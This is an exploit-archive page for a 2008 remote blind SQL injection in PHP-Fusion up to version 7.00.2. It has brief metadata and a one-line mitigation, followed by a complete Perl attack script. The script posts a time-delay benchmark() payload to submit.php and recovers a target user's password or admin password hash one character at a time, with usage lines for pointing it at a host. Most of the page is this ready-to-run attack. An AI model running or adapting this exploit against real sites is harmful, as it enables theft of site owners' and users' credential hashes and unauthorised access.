PHP-Fusion - exploit.company

vendor:

PHP-Fusion

by:

athos

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP-Fusion

Affected Version From: 7.00.2

Affected Version To: 7.00.2

Patch Exists: YES

Related CWE: N/A

CPE: a:php-fusion:php-fusion

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit

This exploit is based on a vulnerability in PHP-Fusion version 7.00.2 which allows an attacker to inject malicious SQL commands into the application. The exploit is a blind SQL injection which means that the attacker can not see the output of the SQL query, but can determine the output by sending different SQL queries and analyzing the response of the application.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL query.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
# -------------------------------------------------------
# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# download on http://php-fusion.co.uk
# -------------------------------------------------------
# Usage:
# perl xpl.pl host/path prefix user_id user_pwd target_id
# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1
# -------------------------------------------------------
# Note: magic_quotes_gpc off && register globals on
#       don't add me on msn messenger 
#       my email staker.38@gmail.com
# 
# Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer :D 
# -------------------------------------------------------
# This is pratically the same vulnerability of 6.01.14
# version (http://milw0rm.com/exploits/5470) found by 
# The:Paradox. PHP-Fusion's coder seems not interested in
# Web Security, isn't him? 
# -------------------------------------------------------
# User Password:  my $field = "user_password" ;
# Admin Password: my $field = "user_admin_password";                   
# -------------------------------------------------------

use strict;
use Digest::MD5('md5_hex');
use LWP::UserAgent;


my $field = "user_password";
my ($stop,$start,$hash);


my $domain = shift;
my $ptable = shift;
my $ulogin = shift;
my $plogin = shift;
my $userid = shift or &usage;

my @chars = (48..57, 97..102); 
my $substr = 1; 
my $http = new LWP::UserAgent;



sub send_request
{ 
     my $post = undef;
     my $host = $domain;
     my $param = shift @_ or die $!;
  
     $host  .= "/submit.php?stype=l";

     $http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin));
     $post = $http->post('http://'.$host,[
                                 'link_category'    => 1,
                                 'link_name'        => 1,
                                 'link_url'         => 1,
                                 'link_description' => 1,
                                 'submit_link'      => 'Submit+Link',
                                 'submit_info[pwn]' => $param,
                               ]);
 
}


sub give_char
{
     my $send = undef;
     my ($charz,$uidz) = @_;
  
     $send = "' or (select if((ascii(substring".
             "($field,$uidz,1))=$charz),".
             "benchmark(230000000,char(0)),".
            "0) from ${ptable}_users where user_id=$userid))#";

     return $send;
}


for(1..32) 
{
     foreach my $set(@chars)
     {
          my $start = time();
    
          send_request(give_char($set,$substr));
    
          my $stop = time();
  
         if($stop - $start > 6)
         { 
              syswrite(STDOUT,chr($set));
              $substr++; 
              last;
        }
    }
}

sub usage
{
      print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n";
      print "by athos - staker[at]hotmail[dot]it\n";
      print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n";
      print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n"; 
      exit; 
}     

# milw0rm.com [2008-12-24]